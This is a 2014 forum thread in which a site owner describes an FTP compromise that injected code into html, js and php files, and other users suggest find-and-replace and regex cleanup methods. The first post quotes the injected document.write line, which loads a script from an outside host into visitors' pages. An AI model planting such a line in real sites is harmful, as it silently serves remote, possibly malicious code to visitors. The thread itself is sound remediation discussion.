1. Advertising
    y u no do it?

    Advertising (learn more)

    Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

    Starts at just $1 per CPM or $0.10 per CPC.

Removing code injected into html, js, and php files

Discussion in 'Security' started by Yoav1, Apr 19, 2014.

  1. #1
    Hello everyone,

    I had my site attacked through ftp today (I blocked it now), and some code injected into html, javascript, and php files.

    Could you please tell me how to remove this code? Is there a tool that does this automatically?

    The code looks like this:

    /*8876fed*/

    document.write('<script type="text/javascript" src="http://www.nilgeor.de/gallery/hasdgf.php?id=981249768"></script>');

    /*8876fed*/

    the numbers are not consistent, and change in each file.
    SEMrush
    Thanks!
     
    Yoav1, Apr 19, 2014 IP
    SEMrush
  2. PoPSiCLe

    PoPSiCLe Illustrious Member

    Messages:
    4,623
    Likes Received:
    725
    Best Answers:
    152
    Trophy Points:
    470
    #2
    Well, any decent text-editor will handle find/replace in multiple files - since you're not telling us which system you're on, nor your knowledge level, it's a bit hard to tell exactly what to do, but it goes something like this (if you prefer Windows):
    Open the site in an FTP / SFTP session, select all the files, open them in your favorite text-editor (not Notepad, but something proper, like Notepad++ or Sublime or similar) and do a search/find/replace and remove all the malicious code - if the text/content differs, you might wanna do a manual replace, but that can get tedious quite quickly, if there are many files, so you might wanna use regular expressions to search for the content you're looking for.
     
    PoPSiCLe, Apr 22, 2014 IP
  3. Tier_net

    Tier_net Active Member

    Messages:
    35
    Likes Received:
    5
    Best Answers:
    3
    Trophy Points:
    58
    #3
    If you are running Linux and have MySQL installed, there is a nifty executeable already in your path called "replace". It is handy for this type of stuff. In its basic form, it works like this:

    replace 'search-text' 'replace-text' -- files.php

    You can do it with multiple files:

    replace 'search-text' 'replace-text' -- *.php

    will replace the search text with the replace text in all php files in the directory. You can also use */*.php.

    It also uses regular expressions. Please first try this on a test file before you try it en mass:

    replace 'document.write(\'<script type=\"text/javascript\" src=http://www.nilgeor.de/gallery/.+></script>\');' '' -- testfile.php

    That will at least remove the javascript portion of it. You can probably figure out the rest from there (the .+ is a wildcard)
     
    Tier_net, May 20, 2014 IP